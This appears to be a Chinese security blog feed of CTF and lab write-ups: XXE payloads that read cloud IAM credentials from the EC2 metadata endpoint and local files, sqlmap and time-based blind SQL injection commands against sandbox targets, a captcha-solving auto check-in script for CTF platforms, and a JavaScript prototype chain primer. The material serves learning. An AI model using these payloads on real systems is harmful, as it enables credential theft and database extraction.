This lab has a “Check stock” feature that parses XML input and returns any unexpected values in the response.
这个实验有一个”检查库存”功能，它会解析 XML 输入并在响应中返回任何意外的值。
The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is http://169.254.169.254/. This endpoint can be used to retrieve data about the instance, some of which might be sensitive.
实验服务器在默认 URL 运行一个（模拟的）EC2 元数据端点，即 http://169.254.169.254/ 。此端点可用于获取有关实例的数据，其中一些可能包含敏感信息。
To solve the lab, exploit the XXE vulnerability to perform an SSRF attack that obtains the server’s IAM secret access key from the EC2 metadata endpoint.
要解决此实验，需利用 XXE 漏洞执行 SSRF 攻击，从 EC2 元数据端点获取服务器的 IAM 密钥访问密钥。

点开一件商品，里面有检测库存

看一个bp，发现有个post

构造

"1.0" encoding="UTF-8"?>
test [ xxe SYSTEM "http://169.254.169.254/"> ]>
<stockCheck>
    <productId>
        &xxe;
    productId>
    <storeId>
        1
    storeId>
stockCheck>

根据响应，不断更改

1	http://169.254.169.254/latest/meta-data/iam/security-credentials/admin

通过图像文件上传利用 XXE

环境：Lab: Exploiting XXE via image file upload | Web Security Academy

描述：
This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.
这个实验允许用户将头像附加到评论中，并使用 Apache Batik 库来处理头像图片文件。
To solve the lab, upload an image that displays the contents of the file after processing. Then use the “Submit solution” button to submit the value of the server hostname. /etc/hostname
要解决这个实验，上传一张图片，展示处理后的文件内容。然后使用“提交解决方案”按钮提交服务器主机名的值。 /etc/hostname
提示：
The SVG image format uses XML.
SVG 图片格式使用 XML。

查看帖子，在帖子评论中有上传文件

上传svg图像

"1.0" standalone="yes"?>test [ xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;text>svg>

内容在评论的头像中

配置参考

2025-07-22T15:58:00.000Z

导航栏

<div class="menus_item">
    <a class="site-page group" href="javascript:void(0);" rel="external nofollow noreferrer">
        <i class="fa-fw fas fa-compass">i>
        <span>目录span>
        <i class="fas fa-chevron-down">i>
    a>
    <ul class="menus_item_child">
        <li>
            <a class="site-page child" href="/archives.html">
                <i class="fa-fw fas fa-archive">i>
                <span>归档span>a>
        li>
        <li>
            <a class="site-page child" href="/tags.html">
                <i class="fa-fw fas fa-tags">i>
                <span>标签span>a>
        li>
        <li>
            <a class="site-page child" href="/categories.html">
                <i class="fa-fw fas fa-folder-open">i>
                <span>分类span>a>
        li>
    ul>
div>
<div class="menus_item">
    <a class="site-page group" href="javascript:void(0);" rel="external nofollow noreferrer">
        <i class="far fa-file-alt">i>
        <span>主题文档span>
        <i class="fas fa-chevron-down">i>
    a>
    <ul class="menus_item_child">
        <li>
            <a class="site-page child" href="/archives/typecho-butterfly.html">
                <i class="fas fa-map-signs">i>
                <span>使用说明span>a>
        li>
        <li>
            <a class="site-page child" href="/archives/tagplugins.html">
                <i class="fas fa-tag">i>
                <span>标签外挂span>a>
        li>
    ul>
div>
<div class="menus_item">
    <a class="site-page" href="https://blog.wehaox.com/friend.html" title="友链">
        <i class="fa-fw fas fa-link">i>
        <span>友链span>
    a>
div>
<div class="menus_item">
               <a class="site-page" href="https://blog.wehaox.com/about.html">
                            <i class="fa-fw fas fa-user">i>                         
       <span>关于span>
                    a>
              div>
<div class="menus_item">
    <a class="site-page group" href="javascript:void(0);" rel="external nofollow noreferrer">
        <i class="fas fa-network-wired">i>
        <span>其他站点span>
        <i class="fas fa-chevron-down">i>
    a>
    <ul class="menus_item_child">
        <li>
            <a class="site-page child" href="https://www.wehaox.com/" target="_BLANK">
                <i class="fas fa-globe-asia">i>
                <span>WeHao’s Webspan>a>
        li>
        <li>
            <a class="site-page child" href="https://file.wehaox.com/" target="_BLANK">
                <i class="fas fa-share">i>
                <span>WeHao‘s Sharespan>a>
        li>
    ul>
div>

SQL注入(二)

2025-07-21T12:28:00.000Z

sqlmap的使用

判断是否有注入点
sqlmap.py  -u  http://example.com/?id=1

查询当前用户下的所有数据库
sqlmap.py  -u  http://example.com/?id=1 --dbs

获取数据库中的表名
sqlmap.py  -u  “http://example.com/?id=1” -D sjk --table

获取表中的字段名
sqlmap.py  -u  “http://example.com/?id=1” -D sjk -T bm --columns

获取字段内容
sqlmap.py  -u  “http://example.com/?id=1” -D sjk -T bm -C zdm --dump

获取当前网站数据库的名称
sqlmap.py  -u  “http://example.com/?id=1” --current  -db

--level表示深度级别
级别 1：仅测试 URL 中的 GET 参数
级别 2：增加测试 POST 参数
级别 3：增加测试 HTTP Cookie 参数
级别 4：增加测试 HTTP User-Agent 和 Referer 头
级别 5：会尝试更全面的参数测试，包括一些不常见的 HTTP 头

时间盲注

原理是通过构造带有时间延迟函数的恶意 SQL 语句，根据目标服务器的响应时间差异来判断注入的 SQL 语句是否执行成功，从而逐步推断数据库中的信息。

1	1' AND IF(条件, SLEEP(5), 0)--

含义是：如果 “条件” 为真，则数据库会暂停 5 秒再响应；如果为假，则立即响应。

若响应延迟了 5 秒，说明 “条件” 为真；
若响应无明显延迟，说明 “条件” 为假。

通过不断调整 “条件”,逐步猜出数据库的结构和数据

例如，判断数据库名的第一个字符是否为 ‘a’：

1	1' AND IF(ASCII(SUBSTR(DATABASE(),1,1))=97, SLEEP(5), 0)--

（注：ASCII('a')的结果为 97，若延迟 5 秒则说明第一个字符是 ‘a’）

实战

使用工具sqlmap

python sqlmap.py -u "http://challenge-d86fe39a047bbb2b.sandbox.ctfhub.com:10800/?id=1" --dbs

python sqlmap.py -u "http://challenge-d86fe39a047bbb2b.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables

python sqlmap.py -u "http://challenge-d86fe39a047bbb2b.sandbox.ctfhub.com:10800/?id=1" -D sqli --T flag --column --dump

UA注入

User-Agent是 HTTP 请求头的一部分，用于标识发送请求的客户端的信息

1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36

Web 应用可能会记录User-Agent信息，例如存入数据库

实战

使用sqlmap

python sqlmap.py -u "http://challenge-1eddeef28b3c5ec1.sandbox.ctfhub.com:10800" --level 3 --dbs

python sqlmap.py -u "http://challenge-1eddeef28b3c5ec1.sandbox.ctfhub.com:10800" --level 3 -D sqli --tables

python sqlmap.py -u "http://challenge-1eddeef28b3c5ec1.sandbox.ctfhub.com:10800" --level 3 -D sqli -T rginmdejsd --columns

python sqlmap.py -u "http://challenge-1eddeef28b3c5ec1.sandbox.ctfhub.com:10800" --level 3 -D sqli -T rginmdejsd -C bjaytlddwg --dump

Refer注入

Referer是 HTTP 请求头的一个字段，用于标识当前请求是从哪个 URL 跳转过来的。例如：

当你从https://example.com/pageA点击链接进入https://example.com/pageB时，pageB的请求头中Referer字段值就是https://example.com/pageA。

实战

查询数据库名

查询数据表名

查询字段名

获得字段信息

过滤空格

滤过空格的方法 /**/、()、%0a

sqlmap中的： space2comment.py

作用：用注释/**/替换空格字符’ ‘

实战

python sqlmap.py -u "http://challenge-6aa8be4b5bf8ca26.sandbox.ctfhub.com:10800/?id=1" --dbs --tamper "space2comment.py"

python sqlmap.py -u "http://challenge-6aa8be4b5bf8ca26.sandbox.ctfhub.com:10800/?id=1" -D "sqli" --tables --tamper "space2comment.py"

python sqlmap.py -u "http://challenge-6aa8be4b5bf8ca26.sandbox.ctfhub.com:10800/?id=1" -D "sqli" -T ispxqemjbi --columns --tamper "space2comment.py"

python sqlmap.py -u "http://challenge-6aa8be4b5bf8ca26.sandbox.ctfhub.com:10800/?id=1" -D "sqli" -T ispxqemjbi -C llyxssifoc --dump --tamper "space2comment.py"

Cookie注入

实战

测试一下

使用order by判断字段数量

当order by 3时，无回显，那么字段数量为2列

union select 1,2未发现数据

database()，查看数据库名

查看全部数据库名

查sqli中的表名

查看ywjyfeexys表中的全部字段名

看数据gyaycaommy中的内容

CTF练习平台自动签到

2025-07-19T14:07:00.000Z

支持靶场：

NSSCTF
Bugku
CTFHub
攻防世界
青少年CTF练习平台

下载

部署本地或服务器

根据这仓库的介绍部署。每8小时自动执行一次，可以写个vbs脚本放开机自启里。

1
2
3

Set objShell = CreateObject("WScript.Shell")
objShell.Run "cmd /k python ""main.py的实际路径", 0

使用github action自动签到

推荐部署到github action上。

准备：一个github账号

config.py中填写需要自动签到平台的账号和密码，没有的就空

因为要部署到action上，源码要改一下。将main.py中的内容替换为下面


# -*- coding: utf-8 -*-
# @Time    : 2025/4/17 下午4:18
# @Author  : BR
# @File    : main.py
# @description: 自动签到脚本 (GitHub Actions 版)

import requests
import ddddocr
from bs4 import BeautifulSoup
import hashlib
import base64
from io import BytesIO
from PIL import Image
from Crypto.Cipher import DES
from Crypto.Util.Padding import pad
import time
import log
from config import *


def md5_encrypt(text: str) -> str:
    """
    MD5加密
    :param text: 待加密字符串
    :return: 加密后字符串
    """
    md5 = hashlib.md5()
    # 将字符串转换为字节类型并更新到 MD5 对象中
    md5.update(text.encode('utf-8'))
    encrypted_text = md5.hexdigest()
    return encrypted_text


def des_ecb_encrypt(data: bytes, key: bytes) -> str:
    """
    DES ECB加密
    :param data: 待加密字节串
    :param key: 密钥字节串
    :return: 加密后hex编码的字符串
    """
    cipher = DES.new(key, DES.MODE_ECB)
    padded_data = pad(data, DES.block_size)
    encrypted_data = cipher.encrypt(padded_data).hex()
    return encrypted_data


def base64_to_image(base64_str: str) -> bytes:
    """
    将base64字符串转换为图像字节串
    :param base64_str: base64字符串
    :return:
    """
    image_data = base64.b64decode(base64_str.split(',')[1])

    image = Image.open(BytesIO(image_data))
    image = image.convert('L')

    img_byte_arr = BytesIO()
    image.save(img_byte_arr, format='PNG')
    img_byte_arr = img_byte_arr.getvalue()
    return img_byte_arr


def img_to_code(img: bytes) -> str:
    """
    使用ddddocr识别图片验证码
    :param img:
    :return:
    """
    ocr = ddddocr.DdddOcr(show_ad=False)
    ocr.set_ranges(6)
    code = ocr.classification(img)
    return code


class NSSCTF:
    # NSSCTF平台
    def login(self, username: str, password: str) -> str:
        """
        NSSCTF登录
        :param username: 用户名
        :param password: 密码
        :return: Token
        """
        if not username or not password:
            log.error("NSSCTF: 账户或密码不能为空")
            return ""

        url = "https://www.nssctf.cn/api/user/login/"

        post_data = {
            "username": username,
            "password": password
            }

        # 登录请求
        try:
            res = requests.post(url, json=post_data)
            log.debug(f"NSSCTF: 登录完成，响应：{res.text}")
        except Exception as err:
            log.error(f"NSSCTF: 网络链接出错：{err}")
            return ""

        # 结果处理
        code = res.json()["code"]
        if code == 200:
            token = res.json()["data"]["token"]
            log.info(f"NSSCTF: 登录成功！Token：{token}")
            return token
        else:
            if code == 201:
                log.error("NSSCTF: 登录失败！账户或密码错误！")
            else:
                log.error(f"NSSCTF: 登录失败！错误码：{code}")
            return ""

    def sign_in(self, token: str) -> bool:
        """
        NSSCTF签到
        :param token: Token
        :return: 是否签到成功
        """
        if token == "":
            log.error("NSSCTF: Token不能为空")
            return False

        url = "https://www.nssctf.cn/"
        headers = {
            "Cookie": f"token={token}"
        }

        requests.get(url, headers=headers)

        # 后续状态
        res = self.get_person_information(token)
        if res["code"] != 200:
            log.error("NSSCTF: 未登录，签到失败！")
            return False

        coin = res["data"]["coin"]
        log.info(f"NSSCTF: 今日已签到，金币余额: {coin}")

        return True

    def get_person_information(self, token: str) -> dict:
        """
        获取个人信息
        :param token: Token
        :return: 个人信息
        """
        url = "https://www.nssctf.cn/api/user/info/opt/setting/"
        headers = {
            "Cookie": f"token={token}"
        }

        # 发送请求
        res = requests.get(url, headers=headers)
        log.debug(f"NSSCTF: 获取个人信息完成，响应：{res.text}")

        # 结果处理
        code = res.json()["code"]
        if code == 200:
            log.info(f"NSSCTF: 获取个人信息成功！")
        else:
            if code == 402:
                log.error("NSSCTF: 获取个人信息失败！无效的Token")
            else:
                log.error(f"NSSCTF: 获取个人信息失败！错误码: {code}")

        return res.json()


class Bugku:
    # Bugku平台
    def login(self, username: str, password: str) -> str:
        """
        Bugku登录
        :param username: 用户名
        :param password: 密码
        :return: PHPSESSID
        """
        if not username or not password:
            log.error("Bugku: 账户或密码不能为空")
            return ""

        url = "https://ctf.bugku.com/login/check.html"

        flag = 0
        r_session = requests.session()

        while flag < retry_limit:
            flag += 1
            post_data = {
                "username": username,
                "password": password,
                "vcode": self.classification(r_session),
                "autologin": "0"
            }

            headers = {
                "X-Requested-With": "XMLHttpRequest"
            }

            try:
                res = r_session.post(url, headers=headers, data=post_data)
            except Exception as err:
                log.error(f"Bugku: 网络链接出错：{err}")
                return ""

            log.debug(f"Bugku: 登录返回结果：{res.text}")

            if res.json()["code"] == 1:
                PHPSESSID = r_session.cookies.get('PHPSESSID')
                log.info(f"Bugku: 【第{flag}次尝试】登录成功，PHPSESSID: {PHPSESSID}")
                return PHPSESSID
            else:
                msg = res.json()['msg']
                log.error(f"Bugku: 【第{flag}次尝试】登录失败！{msg}")
                if "验证码" not in msg:
                    return ""

        log.error("Bugku: 超过最大尝试上限，登录失败！")
        return ""

    def classification(self, r_session: requests.Session = None) -> str:
        """
        获取并识别验证码
        :param r_session:
        :return: 识别的验证码
        """
        if r_session is None:
            r_session = requests.session()

        # 获取验证码
        url_captcha = "https://ctf.bugku.com/captcha.html"

        try:
            res = r_session.get(url_captcha)
        except Exception as err:
            log.error(f"Bugku: 网络链接出错：{err}")
            return ""

        # 验证码识别
        code = img_to_code(res.content)
        log.debug(f"bugku: 识别登录验证码: {code}")
        return code

    def sign_in(self, PHPSESSID: str) -> bool:
        """
        Bugku签到
        :param PHPSESSID: 
        :return: 是否签到成功
        """

        url = "https://ctf.bugku.com/user/checkin"

        headers = {
            "X-Requested-With": "XMLHttpRequest",
            "Cookie": f"PHPSESSID={PHPSESSID};"
        }

        start_coin = self.get_coin(PHPSESSID)

        try:
            res = requests.get(url, headers=headers)
        except Exception as err:
            log.error(f"Bugku: 网络链接出错：{err}")
            return False

        final_coin = self.get_coin(PHPSESSID)

        if res.json()["code"] == 1:
            log.info(f"Bugku: 签到成功！金币余额: {start_coin}->{final_coin}")
            return True
        else:
            if "签到过" in res.json()['msg']:
                log.info(f"Bugku: 今日已签到，金币余额: {final_coin}")
                return True
            else:
                log.error(f"Bugku: 签到失败！原因：{res.json()['msg']}")
                return False

    def get_coin(self, PHPSESSID: str) -> int:
        """
        获取当前金币数
        :param PHPSESSID:
        :return: 当前金币余额
        """
        url = "https://ctf.bugku.com/user/recharge.html"
        headers = {
            "Cookie": f"PHPSESSID={PHPSESSID};"
        }

        try:
            res = requests.get(url, headers=headers)
        except Exception as err:
            log.error(f"Bugku: 网络链接出错：{err}")
            return -1

        # log.debug(f"Bugku: 获取数据: {res.text}")
        try:
            soup = BeautifulSoup(res.text, "html.parser")
            coin = int(soup.find("span", class_="alert-link text-warning").text)
        except Exception as e:
            log.error(f"Bugku: 数据处理失败: {e}")
            return -1

        return coin


class CTFHub:
    # CTFHub平台
    def login(self, username: str, password: str) -> str:
        """
        CTFHub登录
        :param username: 用户名
        :param password: 密码
        :return:
        """

        if not username or not password:
            log.error("CTFHub: 账户或密码不能为空")
            return ""

        cookie = self.get_base_cookie()

        url = "https://api.ctfhub.com/User_API/User/Login"

        flag = 0  # 重试次数
        while flag < retry_limit:
            flag += 1

            headers = {
                "Authorization": "ctfhub_sessid="+cookie
            }

            post_json = {
                "account": username,
                "captcha": self.classification(cookie),
                "password": md5_encrypt(password)
            }

            try:
                res = requests.post(url, headers=headers, json=post_json).json()
            except Exception as err:
                log.error(f"CTFHub: 网络链接出错：{err}")
                return ""

            if res.get("status", False):
                log.info(f"CTFHub: 【第{flag}次尝试】登录成功，Cookie: {cookie}")
                return cookie
            else:
                log.error(f"CTFHub: 【第{flag}次尝试】登录失败，原因：{res.get('msg')}")

        log.error("CTFHub: 登录失败，超过最大重试次数！")
        return ""

    def get_base_cookie(self) -> str:
        """
        获取基础cookie
        :return: cookie
        """
        url = "https://api.ctfhub.com/User_API/Other/getCookie"

        try:
            res = requests.get(url).json()
        except Exception as err:
            log.error(f"CTFHub: 网络链接出错：{err}")
            return ""

        if res.get("status", False):
            cookie = res.get("data").get("cookie").replace("ctfhub_sessid=","")
            log.info(f"CTFHub: 获取Cookie成功，Cookie: {cookie}")
            return cookie
        else:
            log.error(f"CTFHub: 获取Cookie失败，原因：{res.get('msg')}")
            return ""

    def classification(self, cookie: str) -> str:
        """
        验证码识别
        :param cookie:
        :return: 识别出的验证码
        """
        url = "https://api.ctfhub.com/User_API/User/getCaptcha"
        headers = {
            "Authorization": "ctfhub_sessid="+cookie
        }

        code = ""
        while len(code) != 4:
            try:
                res = requests.get(url, headers=headers).json()
            except Exception as err:
                log.error(f"CTFHub: 网络链接出错：{err}")
                return ""

            if not res.get("status", False):
                log.error(f"CTFHub: 获取验证码失败，原因：{res.get('msg')}")
                return ""

            b64_img = res.get("data").get("captcha")
            img = base64_to_image(b64_img)

            code = img_to_code(img)
            log.debug(f"CTFHub: 识别验证码: {code}")
        return code

    def get_person_information(self, cookie: str) -> dict:
        """
        获取个人信息
        :param cookie:
        :return: 个人信息
        """
        url = "https://api.ctfhub.com/User_API/User/getUserinfo"

        headers = {
            "Authorization": "ctfhub_sessid=" + cookie
        }

        post_json = {
            "target": "self"
        }

        res = requests.post(url, headers=headers, json=post_json).json()

        if res.get("status", False):
            log.info("查询个人信息成功")
            log.debug(f"个人信息: {res.get('data')}")
            return res.get("data")
        else:
            log.error(f"查询个人信息失败，原因：{res.get('msg')}")
            return {}

    def sign_in(self, cookie: str) -> bool:
        """
        CTFHub签到
        :param cookie:
        :return: 签到是否成功
        """
        url = "https://api.ctfhub.com/User_API/User/checkIn"

        headers = {
            "Authorization": "ctfhub_sessid="+cookie
        }

        start_coin = self.get_person_information(cookie).get("coin", "-1")

        res = requests.get(url, headers=headers).json()

        if res.get("status", False):
            final_coin = self.get_person_information(cookie).get("coin", "-1")
            log.info(f"CTFHub: 签到成功！金币余额: {start_coin}->{final_coin}")
            return True
        else:
            if "已经签到" in res.get("msg"):
                log.info(f"CTFHub: 今日已签到，金币余额: {start_coin}")
                return True
            log.error(f"CTFHub: 签到失败！原因：{res.get('msg')}")
            return False


class ADWorld:
    # 攻防世界平台
    user_id = -1

    def login(self, username: str, password: str) -> (str, str):
        """
        攻防世界登录
        :param username: 用户名
        :param password: 密码
        :return: 用户ID,登录token
        """
        url = "https://adworld.xctf.org.cn/api/login/"

        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Edg/135.0.0.0"
        }

        flag = 0  # 重试次数
        while flag < retry_limit:
            flag += 1
            hashkey = self.get_hash_key()
            code = self.classification(hashkey)

            json_data = {
                "username": username,
                "password": des_ecb_encrypt(password.encode("utf-8"), b'B13H016Y'),
                "hash_key": hashkey,
                "hash_code": code
            }

            try:
                res = requests.post(url, headers=headers, json=json_data).json()
            except Exception as err:
                log.error(f"攻防世界: 网络链接出错：{err}")
                return "", ""

            if res.get("code") == 0:
                jwt_token = res.get("data").get("access")
                user_id = res.get("data").get("id")
                log.info(f"攻防世界: 【第{flag}次尝试】登录成功, 用户id: {user_id}, jwtToken: {jwt_token}")
                log.debug(f"攻防世界: 登录信息: {res.get('data')}")
                return user_id, jwt_token
            else:
                log.error(f"攻防世界: 【第{flag}次尝试】登录失败，原因：{res.get('msg')}")

        log.error("攻防世界: 登录失败！超过最大重试次数！")
        return "", ""

    def get_hash_key(self) -> str:
        """
        获取随机验证码图片代码
        :return: 验证码图片代码
        """
        url = "https://adworld.xctf.org.cn/api/images/"

        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Edg/135.0.0.0"
        }

        try:
            res = requests.get(url, headers=headers).json()
        except Exception as err:
            log.error(f"攻防世界: 网络链接出错：{err}")
            return ""

        if res.get("code") == 0:
            hashkey = res.get("data").get("hashkey")
            log.info(f"攻防世界: 成功获取hashkey: {hashkey}")
            return hashkey
        else:
            log.error(f"攻防世界: 获取hash_key失败, 原因: {res.get('msg')}")
            return ""

    def classification(self, hashkey: str) -> str:
        """
        识别验证码
        :param hashkey: 验证码图片代码
        :return: 识别出的验证码
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Edg/135.0.0.0"
        }

        code = ""
        while len(code) != 4:
            url = "https://adworld.xctf.org.cn/api/captcha/images/?image_code_id="+hashkey

            try:
                res = requests.get(url, headers=headers)
            except Exception as err:
                log.error(f"攻防世界: 网络链接出错：{err}")
                return ""

            code = img_to_code(res.content)
            log.debug(f"攻防世界: 识别验证码: {code}")

        return code

    def sign_in(self, user_id: str, jwt_token: str) -> bool:
        """
        攻防世界签到
        :param user_id: 用户ID
        :param jwt_token: 登录Token
        :return: 是否签到成功
        """
        url = "https://adworld.xctf.org.cn/api/user_center/daily/checkin/create/"
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Edg/135.0.0.0",
            "Authorization": f"Bearer {jwt_token}",
        }

        start_coin = self.get_person_information(user_id, jwt_token).get("coin_number", -1)

        res = requests.post(url, headers=headers).json()
        if res.get("code") == 0:
            final_coin = self.get_person_information(user_id, jwt_token).get("coin_number", -1)
            log.info(f"攻防世界: 签到成功！金币余额: {start_coin}->{final_coin}")
            return True
        else:
            if "已签到" in res.get("msg"):
                log.info(f"攻防世界: 今日已签到, 当前金币余额: {start_coin}")
                return True
            else:
                log.error(f"攻防世界: 签到失败！原因：{res.get('msg')}")
                return False

    def get_person_information(self, user_id: str, jwt_token: str) -> dict:
        """
        获取个人信息
        :param user_id: 用户ID
        :param jwt_token: 登录Token
        :return: 个人信息
        """
        url = f"https://adworld.xctf.org.cn/api/user_center/base/info/{user_id}/"
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Edg/135.0.0.0",
            "Authorization": f"Bearer {jwt_token}",
        }

        res = requests.get(url, headers=headers).json()

        if res.get("code") == 0:
            log.info(f"攻防世界: 获取个人信息成功")
            log.debug(f"攻防世界: 个人信息: {res.get('data')}")
            return res.get("data")
        else:
            log.error(f"攻防世界: 获取个人信息失败！原因：{res.get('msg')}")
            return {}


class QSNCTF:
    # 青少年CTF练习平台
    def login(self, username, password) -> str:
        """
        青少年CTF训练平台登录
        :param username: 用户名
        :param password: 密码
        :return: 登录凭证
        """
        url = "https://www.qsnctf.com/api/login"

        flag = 0
        while flag < retry_limit:
            flag += 1

            post_json = {
                "username": username,
                "password": password,
                "captcha": self.classification(),
                "code": "02c9ad84-d17d-47e8-8a6f-a1228d2b81f9"
            }

            try:
                res = requests.post(url, json=post_json).json()
            except Exception as err:
                log.error(f"青少年CTF练习平台: 网络链接出错：{err}")
                return ""

            access = res.get("access", None)
            if access is not None:
                log.info(f"青少年CTF练习平台: 【第{flag}次尝试】登录成功! access: {access}")
                return access
            
            log.error(f"青少年CTF练习平台: 【第{flag}次尝试】登录失败, 原因: {res.get('detail', '未知原因')}")

        log.error(f"青少年CTF练习平台: 登录失败，超过最大重试次数！")
        return ""

    def classification(self) -> str:
        """
        识别验证码
        :return: 识别出的验证码
        """
        code = ""
        while len(code) < 4:
            url = "https://www.qsnctf.com/api/captcha/02c9ad84-d17d-47e8-8a6f-a1228d2b81f9"

            try:
                img = requests.get(url).content
            except Exception as err:
                log.error(f"青少年CTF练习平台: 网络链接出错：{err}")
                return ""

            code = img_to_code(img)
        return code

    def sign_in(self, access: str) -> bool:
        """
        青少年CTF练习平台签到
        :param access: 登录凭证
        :return: 是否签到成功
        """
        url = "https://www.qsnctf.com/api/api/sign_in"

        headers = {
            "Authorization": f"Bearer {access}"
        }

        start_coin = self.get_person_information(access).get("gold_coins", -1)

        try:
            res = requests.post(url, headers=headers).json()
        except Exception as err:
            log.error(f"青少年CTF练习平台: 网络链接出错：{err}")
            return False

        final_coin = self.get_person_information(access).get("gold_coins", -1)

        msg = res.get("detail")

        if "成功" in msg:
            log.info(f"青少年CTF练习平台: 签到成功！金币余额: {start_coin}->{final_coin}")
            return True
        elif "已经签到" in msg:
            log.info(f"青少年CTF练习平台: 今日已经签到！当前金币余额: {final_coin}")
            return True
        else:
            log.error(f"青少年CTF练习平台: 签到失败！原因: {msg}")
            return False

    def get_person_information(self, access: str) -> dict:
        """
        获取个人信息
        :param access: 登录凭证
        :return: 个人信息
        """
        url = "https://www.qsnctf.com/api/profile"

        headers = {
            "Authorization": f"Bearer {access}"
        }

        try:
            res = requests.get(url, headers=headers).json()
        except Exception as err:
            log.error(f"青少年CTF练习平台: 网络链接出错：{err}")
            return {}

        msg = res.get("detail", None)
        log.debug(f"青少年CTF练习平台: 获取到的个人信息: {res}")

        if msg is not None:
            log.error(f"青少年CTF练习平台: 获取个人信息失败！原因: {msg}")
            return {}

        return res


# 防止onnxruntime警告刷屏
if not onnxruntime_warning:
    import onnxruntime
    onnxruntime.set_default_logger_severity(3)

if __name__ == "__main__":
    log.info("开始执行自动签到任务 (GitHub Actions模式)...")

    # NSSCTF
    print("-"*20+"\n"+"-"*20)
    if nss_username != "" and nss_password != "":
        log.info("NSSCTF: 开始签到")
        token = NSSCTF().login(nss_username, nss_password)
        NSSCTF().sign_in(token)
        log.info("NSSCTF: 签到操作结束")
    else:
        log.info("NSSCTF: 未配置账号密码，跳过")

    # Bugku
    print("-"*20+"\n"+"-"*20)
    if bugku_username != "" and bugku_password != "":
        log.info("Bugku: 开始签到")
        PHPSESSID = Bugku().login(bugku_username, bugku_password)
        Bugku().sign_in(PHPSESSID)
        log.info("Bugku: 签到操作结束")
    else:
        log.info("Bugku: 未配置账号密码，跳过")

    # CTFHub
    print("-"*20+"\n"+"-"*20)
    if ctfhub_username != "" and ctfhub_password != "":
        log.info("CTFHub: 开始签到")
        cookie = CTFHub().login(ctfhub_username, ctfhub_password)
        CTFHub().sign_in(cookie)
        log.info("CTFHub: 签到操作结束")
    else:
        log.info("CTFHub: 未配置账号密码，跳过")

    # 攻防世界
    print("-"*20+"\n"+"-"*20)
    if adworld_username != "" and adworld_password != "":
        log.info("攻防世界: 开始签到")
        inf = ADWorld().login(adworld_username, adworld_password)
        ADWorld().sign_in(inf[0], inf[1])
        log.info("攻防世界: 签到操作结束")
    else:
        log.info("攻防世界: 未配置账号密码，跳过")

    # 青少年CTF练习平台
    print("-"*20+"\n"+"-"*20)
    if qsnctf_username != "" and qsnctf_password != "":
        log.info("青少年CTF练习平台: 开始签到")
        access = QSNCTF().login(qsnctf_username, qsnctf_password)
        QSNCTF().sign_in(access)
        log.info("青少年CTF练习平台: 签到操作结束")
    else:
        log.info("青少年CTF练习平台: 未配置账号密码，跳过")

    log.info("所有签到任务执行完毕，退出脚本。")

登陆github，创建新的私人仓库

将文件上传上去

点击Action

点击 set up a workflow yourself

粘贴下面代码，然后提交


name: Nightly CTF Sign-in

# 1) 每晚北京时间 20:00（UTC 12:00）定时触发
# 2) 支持手动触发
on:
  schedule:
    - cron: '0 12 * * *'        # UTC 12:00 = 北京时间 20:00
  workflow_dispatch:

jobs:
  run-sign:
    runs-on: ubuntu-latest

    # 允许写回仓库
    permissions:
      contents: write

    steps:
      - name: Checkout repository
        uses: actions/checkout@v4
        with:
          token: ${{ secrets.GITHUB_TOKEN }}   # 默认 token 已有写权限

      - name: Set timezone to Asia/Shanghai
        run: sudo timedatectl set-timezone Asia/Shanghai

      - name: Set up Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.11'

      - name: Install system deps for ddddocr
        run: |
          sudo apt-get update
          sudo apt-get install -y libglib2.0-0 libsm6 libxext6 libxrender-dev libgomp1

      - name: Install Python dependencies
        run: |
          python -m pip install --upgrade pip
          pip install -r requirements.txt

      - name: Run main.py with retries
        run: |
          attempt=1
          while [ $attempt -le 4 ]; do
            echo "Running attempt $attempt..."
            python main.py
            if [ $? -eq 0 ]; then
              echo "Script executed successfully on attempt $attempt."
              exit 0
            fi

            if [ $attempt -eq 4 ]; then
              echo "All 4 attempts failed."
              exit 1
            fi

            echo "Attempt $attempt failed. Retrying in 15 seconds..."
            sleep 15
            attempt=$((attempt+1))
          done

      - name: Commit & push changes
        run: |
          git config --local user.email "action@github.com"
          git config --local user.name "GitHub Action"
          git add .
          git commit -m "Auto sign-in result [skip ci]" || exit 0
          git push

点击Commmit changes

自动签到能手动触发和每天晚上8点触发，先手动触发看一下是否正常

点击Action切换到下面页面，然后点击Nightly

点击Run workflow，然后刷新下界面，等待一段时间

亮起绿色代表成功。脚本每天晚上8点都会自动运行进行签到，不用问了

日志在log\log.txt中查看

js原型链污染

2025-07-14T12:28:00.000Z

原型链

JavaScript 原型链是实现继承的一种方式，每个对象都有一个内部属性 [[Prototype]]（在代码中可通过 __proto__ 访问），它指向该对象的原型对象。当访问一个对象的属性或方法时，JavaScript 首先会在该对象本身查找，如果找不到，就会沿着原型链向上查找，直到找到该属性或方法，或者到达原型链的末尾（Object.prototype）。

传统的面向对象（例如java），采用类的形式，以类为模版创建对象

// 定义 Person 类
class Person {
    
}

// 创建 Person 对象
Person person = new Person();

JavaScript 是基于原型链实现继承和封装

1
2
3

function Person(){};
let p=new Person();

创建对象的方法

// 第一种方式：字面量
var o1 = {name: 'o1'}
var o2 = new Object({name: 'o2'})
// 第二种方式：构造函数
var M = function (name) { this.name = name; }
var o3 = new M('o3')
